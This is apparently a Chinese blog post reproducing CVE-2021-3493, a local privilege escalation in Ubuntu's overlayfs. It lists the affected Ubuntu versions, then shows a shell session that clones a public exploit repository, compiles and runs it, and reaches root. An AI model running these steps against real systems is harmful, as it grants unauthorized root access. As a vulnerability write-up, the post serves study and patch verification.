CVE-2021-3493漏洞复现

漏洞简介

Linux 内核中 overlayfs 文件系统是 Ubuntu 的特定问题,由于没有正确的验证文件系统功能在用户名称空间中的应用,从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限

影响版本

ubuntu 20.04

ubuntu 16.04

ubuntu18.04

ubuntu 14.04

本次复现为ubuntu20.04版本

漏洞复现

test@linux:~# git clone https://github.com/ASkyeye/CVE-2021-3493.git
test@linux:~$ cd CVE-2021-3493/
test@linux:~/CVE-2021-3493$ gcc exploit.c -o exploit
test@linux:~/CVE-2021-3493$ chmod u+x exploit
test@linux:~/CVE-2021-3493$ ./exploit
bash-5.0$ whoami
root
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/hxlinux/p/14716060.html